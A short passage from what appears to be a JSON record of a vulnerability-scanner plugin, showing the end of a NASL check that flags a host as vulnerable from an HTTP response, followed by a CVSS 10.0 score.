200\", string:buf) && (\"NM_A_SZ_RESULT_CODE\" >!< buf))\n security_hole(port);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
